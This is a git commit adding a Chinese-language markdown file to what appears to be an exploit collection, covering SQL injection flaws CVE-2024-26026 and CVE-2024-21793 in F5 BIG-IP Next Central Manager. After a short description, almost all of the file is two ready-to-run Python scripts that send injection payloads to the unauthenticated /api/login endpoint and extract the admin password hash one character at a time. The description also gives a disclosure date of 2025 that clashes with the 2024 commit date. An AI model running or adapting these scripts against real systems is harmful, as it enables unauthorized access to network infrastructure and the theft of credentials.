Create F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793).md

2024-05-09 12:45:41 +08:00 · 2024-05-09 12:45:41 +08:00 · 30773924e7
commit 30773924e7
parent 1b8e579835
1 changed files with 94 additions and 0 deletions
--- a/F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793).md
+++ b/F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793).md
@ -0,0 +1,94 @@
+## F5-BIG-IP存在SQL注入漏洞(CVE-2024-26026)&(CVE-2024-21793)
+
+F5 BIG-IP Next Central Manager 可用于全面管理、自动化和监控部署在任何地方的众多 BIG-IP Next 实例。2025年5月8日，官方披露其存在CVE-2024-26026&CVE-2024-21793 F5 BIG-IP Next Central Manager SQL注入漏洞，攻击者可在无需登陆的情况下利用注入获取数据库中的敏感信息。
+
+## CVE-2024-26026
+```python
+import string
+ 
+import requests
+import urllib3
+import argparse
+ 
+urllib3.disable_warnings()
+ 
+def encode_string(s: str) -> str:
+    return ",".join([f"chr({ord(c)})" for c in s])
+ 
+def leak_hash(target: str, target_user: str = "admin"):
+    charset = string.digits + string.ascii_letters + '/.$'
+    encoded_user = encode_string(target_user)
+ 
+    URL = f"{target}/api/login"
+    current_guess = ''
+    while True:
+        guessed = False
+        for guess in charset:
+            full_guess = encode_string(current_guess + guess + '%')
+            stuff = requests.post(URL, json={
+                "username": "fake_user",
+                "password": "password",
+                "provider_type": "LDAP",
+                "provider_name": f"LDAPP'or' name = (select case when (password like concat({full_guess})) then chr(76)||chr(111)||chr(99)||chr(97)||chr(108) else chr(76) end from mbiq_system.users where username like concat({encoded_user}) limit 1)"
+            }, verify=False).json()
+            if "root distinguished name is required" in stuff["message"]:
+                guessed = True
+                current_guess += guess
+                print("[+]", current_guess)
+                break
+        if not guessed:
+            break
+ 
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Leak the admin password hash')
+    parser.add_argument('target', type=str, help='The target URL')
+    parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
+    args = parser.parse_args()
+    leak_hash(args.target, args.target_user)
+```
+
+
+## CVE-2024-21793
+```python
+import string
+ 
+import requests
+import urllib3
+import argparse
+ 
+urllib3.disable_warnings()
+ 
+ 
+def leak_hash(target: str, target_user: str = "admin"):
+    URL = f"{target}/api/login"
+ 
+    charset = string.digits + string.ascii_letters + '/.$'
+ 
+    current_guess = ''
+ 
+    while True:
+        guessed = False
+        for guess in charset:
+            full_guess = current_guess + guess
+            stuff = requests.post(URL, json={
+                "username": f"fakeuser' or 'username' eq '{target_user}' and startswith('password','{full_guess}') or 'username' eq '1",
+                "password": "password",
+                "provider_type": "LDAP",
+                "provider_name": "LDAP"
+            }, verify=False).json()
+            if stuff["status"] == 500:
+                guessed = True
+                current_guess += guess
+                print("[+]", current_guess)
+                break
+        if not guessed:
+            break
+ 
+ 
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Leak the admin password hash')
+    parser.add_argument('target', type=str, help='The target URL')
+    parser.add_argument('target_user', type=str, help='The target user', default='admin', nargs='?')
+    args = parser.parse_args()
+    leak_hash(args.target, args.target_user)
+```